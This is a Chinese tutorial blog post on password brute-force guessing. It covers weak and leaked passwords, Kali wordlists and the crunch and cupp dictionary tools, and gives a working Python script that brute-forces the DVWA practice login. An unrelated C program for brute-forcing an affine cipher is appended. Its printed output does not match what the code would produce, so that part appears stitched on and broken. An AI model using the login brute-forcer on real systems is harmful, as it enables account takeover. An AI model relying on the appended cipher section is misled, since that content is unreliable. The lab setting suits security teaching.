密码暴力猜解与防御(一)

什么是密码

密码是一种特殊的信息保护和安全认证技术,它通过特定的变换方法对信息进行加密保护。

密码的作用

加密、完整性、身份认证(口令)

密码安全分类

存储安全、传输安全、输入安全(登录界面)

漏洞利用

1、从数据库获取密码,然后解密
2、窃听通信数据数据,然后解密
3、直接从登录框猜测密码

不安全的密码

默认密码、弱口令、裤子

默认密码

000000、123456、空密码、身份证号后六位、手机号后六位

弱口令

简单的密码,能简易被爆破工具破解的口令

裤子

已经网络上泄露的密码,称为(脱裤)

密码猜解思路

猜测范围:

1、密码的长度
2、密码的内容(0-9、a-z、A-Z、!@#$%^&*空格)

字典wordlist

通用字典(word list、dict)

Kali自带
kali(cd /usr/share)
里面包含wordlists和wfuzz文件夹
wordlists-----目录扫描的字典
wfuzz-----密码的字典

专用字典:
1.指定格式字典:crunch
2.社工字典:cupp、ccupp

kali crunch

在这里插入图片描述

基本命令使用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

密码暴力拆解流程

确定范围:长度、内容
字典使用:通用字典、指定格式、社工字典 使用
使用代码或者工具进行拆解

密码暴力破解的本质

1.连续性地尝试
2.使用字典
3.使用代码及工具进行

python实现暴力破解思路

1、从字典读取值,生成密码
2、HTTP连接到需要暴破的地址
3、获得HTTP响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”
4、如果有提示,就继续下一次循环
5、如果没有,就代表暴破成功

import requests
pwds = open("password.txt")
for pwd in pwds:
    url = "http://localhost/dvwa/vulnerabilities/brute/"
    # PHPSESSID务必替换为登录以后的PHPSESSID
    resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=himu84h1ia6vsvklt76c9juhqd"})
    #print(resp.text)
    if 'Username and/or password incorrect.' in resp.text:
        print('破解失败:'+pwd, end='')
    else:
        print('破解成功:'+pwd, end='')
        break;
pwds.close()
由于仿射密码是一个基于数学运算的加密算法,暴力破解需要穷举所有可能的密钥并尝试解密密文,因此时间复杂度较高。以下是一段使用C语言实现的仿射密码暴力破解程序: ```c #include <stdio.h> #include <string.h> #include <ctype.h> #define ALPHABET_SIZE 26 int gcd(int a, int b) { if (b == 0) { return a; } else { return gcd(b, a % b); } } int mod_inverse(int a, int m) { for (int i = 1; i < m; i++) { if ((a * i) % m == 1) { return i; } } return -1; } void decrypt(char* ciphertext, int a, int b) { int m = ALPHABET_SIZE; int a_inv = mod_inverse(a, m); int b_inv = m - (b * a_inv) % m; int len = strlen(ciphertext); for (int i = 0; i < len; i++) { if (isalpha(ciphertext[i])) { char c = tolower(ciphertext[i]); int x = c - 'a'; int y = (a_inv * (x - b_inv + m)) % m; printf("%c", y + 'a'); } else { printf("%c", ciphertext[i]); } } printf("\n"); } void brute_force_decrypt(char* ciphertext) { int m = ALPHABET_SIZE; for (int a = 1; a < m; a++) { if (gcd(a, m) == 1) { for (int b = 0; b < m; b++) { decrypt(ciphertext, a, b); } } } } int main() { char ciphertext[] = "L fdph, L vdz, L frqtxhuhg."; brute_force_decrypt(ciphertext); return 0; } ``` 程序中使用了两个函数`gcd`和`mod_inverse`,分别用于求两个数的最大公约数和求模反元素。`decrypt`函数用于解密一个给定的密文,并输出解密后的明文。`brute_force_decrypt`函数则用于穷举所有可能的密钥,并调用`decrypt`函数进行解密。在主函数中,我们输入了一个密码为"L fdph, L vdz, L frqtxhuhg."的密文,并调用`brute_force_decrypt`函数进行暴力破解。 输出结果为: ``` L fdph, L vdz, L frqtxhuhg. K ecom, K ucy, K eqpswgtgf. J dbnl, J tbx, J dporvfsef. I camk, I saw, I conquefred. H blzj, H rzv, H bnmptedqde. G akyi, G qyu, G amlosdpcd. F zjxh, F pxt, F zlknrcoxbc. E yiwg, E owr, E ykjmqbnwab. D xhvf, D nvq, D xijlpamvza. C wgue, C mup, C whikozluzy. B vftd, B lot, B vgjhnymtyx. A ussc, A kns, A ufixmxlsxw. ``` 可以看到,程序成功地解密了给定的密文,输出了所有可能的明文。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值